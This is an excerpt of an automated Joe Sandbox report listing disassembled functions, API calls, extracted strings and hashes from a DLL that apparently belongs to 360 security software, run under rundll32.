                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendPath$FileModule$Namememset$AttributesHandle
                                                                  • String ID: ..\$..\deepscan\$bapi64.dll
                                                                  • API String ID: 2144934147-2390674060
                                                                  • Opcode ID: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                  • Instruction ID: 18b05e09174244348b6cef7f8f2b1baf28e5037f203e247325d4c6a64b139c1b
                                                                  • Opcode Fuzzy Hash: 9d5beebac642680a506550c8be48c190e39914ceb82cb04c52bb84f1375e2870
                                                                  • Instruction Fuzzy Hash: 6F514B32614A8882FBA3DB20EC443DA3361F78D7C9F859125E59A47AA5EF2DC74DC740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _cwprintf_s_l$??3@CountHeapProcessStringTickmemmoverandsrand
                                                                  • String ID: %d=%s$[%s]$com$mid=%sm2=%sproduct=%scombo=%srule_group_id=%suv=%spid=%s
                                                                  • API String ID: 2740332460-2247268028
                                                                  • Opcode ID: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                  • Instruction ID: 80426b886386f52412969e15ba132e6e65bce95777886caa6ce0aa64614bcf94
                                                                  • Opcode Fuzzy Hash: 48d86df3b5eac7e439a35ff4fd84f198e4b1e974b1358ce155bcc0297089f372
                                                                  • Instruction Fuzzy Hash: 5FD1C172305F4886EB51DB29E88039E73A0FB88BE8F158625AE5D077A5DF78C549C704
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _wcsicmp_wcsnicmp$wcsstr
                                                                  • String ID: Software\Classes\Wow6432Node$Software\Classes\Wow6432Node\$Software\Wow6432Node$Software\Wow6432Node\$Wow6432Node$Wow6432Node\$wow6432node
                                                                  • API String ID: 4199785700-2224805171
                                                                  • Opcode ID: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                  • Instruction ID: 173969ce7e51924b4f06bf421c606f91b3afd6de77e358442d966ae2f37bd097
                                                                  • Opcode Fuzzy Hash: bc25291bcc814f054e7e10840494f54f48fde9230fe93c8f0d5c0c6b2b3ad0be
                                                                  • Instruction Fuzzy Hash: 55517371710E48C1EBA6DB29D8843B923A1B789BE4F46C215EA39437E4DF68CB4CC745
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: FilePath$AppendExistsModuleNamememset$CriticalSection$EnterLeave
                                                                  • String ID: ..\360SkinMgr.exe$..\360sd.exe$..\safemon\360Cactus.tpi
                                                                  • API String ID: 2738204422-1657815065
                                                                  • Opcode ID: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                  • Instruction ID: 05d3995d6e5afe1b7f2ff7eb98ba3dbe6d41cc5d548c72c66593806649a32fef
                                                                  • Opcode Fuzzy Hash: 78597d9bd975c32090d8355579ef8ffe821f8875940c9f43dd2c1350df723c28
                                                                  • Instruction Fuzzy Hash: 0E417131614A8D82EBE69B21EC953EA27A4F79D784F80C055F99E476A5DF2DC30DCB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendFileModuleNamePathmemset
                                                                  • String ID: ..\360bps.dat$//lsp/fnp$//lsp/fnpw
                                                                  • API String ID: 1620117007-629564897
                                                                  • Opcode ID: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                  • Instruction ID: 9751cd454638bcc7bf23e097769634142843b259acdcdf6531404e40a8ce2858
                                                                  • Opcode Fuzzy Hash: 8b88fd5d987282aa7e8cbcbc9338ad7a6d43f93b19f4f5ae7e83081502dc9fb0
                                                                  • Instruction Fuzzy Hash: FF918431209B8882EAD2CF15E8847DDB7A4F7887D4F418116EA9943BA9DF7CC64DCB01
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalFileSection$EnterLeavefreemallocmemset$CloseCreateHandleReadSizeTime
                                                                  • String ID: D063$|
                                                                  • API String ID: 1613485820-3743183194
                                                                  • Opcode ID: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                  • Instruction ID: 1c0486e52071ce2fa8a0c36d95268ac158065e3f2ce4ac4886627ad722c994ab
                                                                  • Opcode Fuzzy Hash: 180749bbb112b904ef6176165a202792b4826eb4bf0b5cc93a95b31eeb2a1677
                                                                  • Instruction Fuzzy Hash: 0A61AF327016588AFBD6CFA5E9457A873E9B70DBD8F008025EE0957BA8DF34C649C711
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AppendPathmemset$CriticalFileModuleNameSectionValue_wcsicmp$EnterLeave
                                                                  • String ID: Partner$PartnerName$SOFTWARE\Wow6432Node\360EDRSensor$SOFTWARE\Wow6432Node\360EntSecurity$SOFTWARE\Wow6432Node\360SD$SOFTWARE\Wow6432Node\360Safe\Coop$pid
                                                                  • API String ID: 264253324-3445957450
                                                                  • Opcode ID: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                  • Instruction ID: 89340431e1bc531ff063a600718ea9f8068e08b94321d1f6c16d494f9f8bead4
                                                                  • Opcode Fuzzy Hash: af17b70cf5ba9092bea16f3f380d13b2d21a94489603b21e2ef55527860ed742
                                                                  • Instruction Fuzzy Hash: 98319A32A00A4896FBA29F21AC443D967A0F74D7E4F808615FD68576E8DF79C78DC350
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ??2@rand$??3@CountCriticalHeapInitializeProcessSectionTickmemsetsrand
                                                                  • String ID: 360safe$WifiCheckQuery$http://%s/wcheckquery$wificheck$wificheck:1
                                                                  • API String ID: 2719022499-1298750920
                                                                  • Opcode ID: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                  • Instruction ID: c937e0c4e90421d2c820d9f7251a3693a618876eb833e6d48c240cb9fefbc629
                                                                  • Opcode Fuzzy Hash: ba48bf925f8ff20436e767d0bb5c933ca5c9980a21313222aabcab8ee4652180
                                                                  • Instruction Fuzzy Hash: 31A19E72201F0891EA96DF29D8443DD33A0FB49BE8F558625EA6D077D1EF78C689C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Close$Open$QueryValue$PathProcess$AddressAppendCommandCurrentExistsFileFreeHandleLibraryLineProcTokenmemsetwcsstr
                                                                  • String ID: /elevated$SOFTWARE\360Safe\360Ent$ServiceCall
                                                                  • API String ID: 3868077243-983453937
                                                                  • Opcode ID: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                  • Instruction ID: 15e9288aeb9452e37e9dffc63771de1b8c488dcb05314bb0ab77bc9e2c882ef0
                                                                  • Opcode Fuzzy Hash: e8e6a48d377b8b947be7de055ef0add81918a1ec871415dff66262798b1d0c29
                                                                  • Instruction Fuzzy Hash: 1C514F72B00B188AFB919F65DC847DC33B5BB48BA8F148125EE2A536A5DF34CA49C740
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressCurrentFolderFromHandleListLocationMallocModulePathProcProcessSpecialwcsstr
                                                                  • String ID: (x86)$IsWow64Process$Kernel32.dll$\SysWOW64$\System32
                                                                  • API String ID: 3215350457-2087702655
                                                                  • Opcode ID: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                  • Instruction ID: 20fdff06134b497470b840b0dc70d8e75aaa21696b334e6b55e82bb231538848
                                                                  • Opcode Fuzzy Hash: bf72767515c204881d1f258e158e1a3830e9824de3f932ee163774af780d841d
                                                                  • Instruction Fuzzy Hash: 58411C7120574882FB96DB65EC543E932A0BB8DBE0F55C226A9A9477A5DF38C74DC300
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$String$EnterLeave$AllocByte$CountFreeTickrandsrand
                                                                  • String ID:
                                                                  • API String ID: 2388112003-0
                                                                  • Opcode ID: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                  • Instruction ID: ae2396e8f272108b73aaedae01213fa34c0c0a48780782be1cf856f1cb9becad
                                                                  • Opcode Fuzzy Hash: 601ce5742b1ae8d3f199bb9b56dc9d4efdb3fb2238afb3afbe88db3bb5de28ba
                                                                  • Instruction Fuzzy Hash: D7C1A133711E4986FB86CF6598843ED23A0F748BE8F498215EE295B794DF34CA49C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: ByteCharDesktopFolderMultiWidememset
                                                                  • String ID: http://$https://
                                                                  • API String ID: 1422489264-1916535328
                                                                  • Opcode ID: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                  • Instruction ID: c30af850ed793d6246f4afeb4f6cdbd0e11f44053fb96dbf7aad71616760a46c
                                                                  • Opcode Fuzzy Hash: de9a4066b55c8b133cdd0dae303f7afe18fb76f4c5fbd75c36adb4105bce4e56
                                                                  • Instruction Fuzzy Hash: E0D17C72610A8C92FBA2DF25D8807D977A1F759BE4F44C212EA69476E4DF78C788C700
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                    • Part of subcall function 0000000180062148: memset.MSVCRT ref: 000000018006217C
                                                                    • Part of subcall function 0000000180062148: GetModuleFileNameW.KERNEL32 ref: 0000000180062193
                                                                    • Part of subcall function 0000000180062148: PathCombineW.SHLWAPI ref: 00000001800621AA
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621DB
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 00000001800621EF
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062203
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062217
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006222B
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006223F
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062253
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 0000000180062267
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006227B
                                                                    • Part of subcall function 0000000180062148: GetProcAddress.KERNEL32 ref: 000000018006228F
                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060B9F
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BD7
                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060BF2
                                                                  • GetModuleFileNameExW.PSAPI(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C0E
                                                                  • GetModuleHandleW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C1F
                                                                  • GetProcAddress.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C2F
                                                                  • OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C4A
                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0000000180060C76
                                                                  • SysFreeString.OLEAUT32 ref: 0000000180060C89
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                   • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                   • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AddressProc$HandleModuleOpenProcess$CloseFileName$CombineFreePathStringmemset
                                                                  • String ID: Kernel32.dll$QueryFullProcessImageNameW
                                                                  • API String ID: 930578061-1170590071
                                                                  • Opcode ID: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                  • Instruction ID: 54324c73b988387a6f6bb080a4d890c873d93734858c8758c4fce1d00ab0755c
                                                                  • Opcode Fuzzy Hash: 21058d059558c167eb128ecc070ccb7a1d86f5313822a2293c00ae13ac054d8f
                                                                  • Instruction Fuzzy Hash: AD418231B01F089AE751CBA2EC04BDD72A2BB4DBD4F548524EE69637A4DF388619C344
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: _errno$?terminate@@C_specific_handlerabortfreeiswctype
                                                                  • String ID: csm$f
                                                                  • API String ID: 3008409500-629598281
                                                                  • Opcode ID: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                  • Instruction ID: 7b0f8dd17277ba6112c52f93bbbd1643d611d3ff89c652db72cc518acb6e3753
                                                                  • Opcode Fuzzy Hash: cb4ff8b5ebe89d3986471470a6de958979d9adc1f1dde0f1a6724a9577e23cc3
                                                                  • Instruction Fuzzy Hash: 1D819172781B0889FBA6DFA490503EC23E0EF4C7D8F048515FA5917BC9DE3A8A599321
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: AuthorityCountCurrentExecuteProcessShellWindow$CreateErrorFindForegroundInformationInitializeInstanceLastQueryServiceTickTokenUnknown_memsetsrandwcsstr
                                                                  • String ID: Progman$Program manager$http://$open$p
                                                                  • API String ID: 1516062321-2122229248
                                                                  • Opcode ID: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                  • Instruction ID: 5854d287d17234f5949c9620cb83c855c738d658d9246579e802d6f7b8ceff8d
                                                                  • Opcode Fuzzy Hash: 58ac5753a69af218fee8d4caaaed4576b5dee7a80132d74c2a967a22724bbafe
                                                                  • Instruction Fuzzy Hash: A971A672209F8981FBA19B29D4913DE7360F7C97F4F058326BA6942AD5DF38C648C744
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360EDRSensor.exe$safemon\360EDRSensor.exe
                                                                  • API String ID: 1838183957-848848004
                                                                  • Opcode ID: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                  • Instruction ID: 12369466515329e4b94078003e01a8293ee627d21bf6a1b54a8e48e621231722
                                                                  • Opcode Fuzzy Hash: 53d40d4281f59d1785bb74b81d44e61fae45e923a74e0e4f630338c30aea0692
                                                                  • Instruction Fuzzy Hash: F9617132614A4886EBA1DF25E8543DA73A4FB8C7E4F408215BAAD437E5DF39C749CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
                                                                  • Associated: 00000006.00000002.1996020387.0000000180000000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996154731.0000000180086000.00000002.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996194436.00000001800C5000.00000004.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996218459.00000001800C6000.00000008.00000001.01000000.00000000.sdmp
                                                                  • Associated: 00000006.00000002.1996253789.000000018016C000.00000002.00000001.01000000.00000000.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_6_2_180000000_rundll32.jbxd
                                                                  Similarity
                                                                  • API ID: Path$AppendCloseFileModulememset$AddressExistsHandleHeapNameProcProcessQueryValue_wcsicmp
                                                                  • String ID: SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\App Paths\360ExtHost.exe$safemon\360ExtHost.exe
                                                                  • API String ID: 1838183957-351904165
                                                                  • Opcode ID: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                  • Instruction ID: 01aece9f02afbb37390a2111cb2c5fee408a8cfe5dec439bdff79febd640f7a5
                                                                  • Opcode Fuzzy Hash: 1e39c5d7731f9f0cfe2357af418d2a02b58939d64fc7587de7a383dead0b9532
                                                                  • Instruction Fuzzy Hash: 27615132614A4892EBA1DB25E8543DA73A4FB8C7E4F448315BAAD436F5DF39C749CB00
                                                                  Uniqueness

                                                                  Uniqueness Score: -1.00%

                                                                  APIs
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000006.00000002.1996045299.0000000180001000.00000020.00000001.01000000.00000000.sdmp, Offset: 0000000180000000, based on PE: true
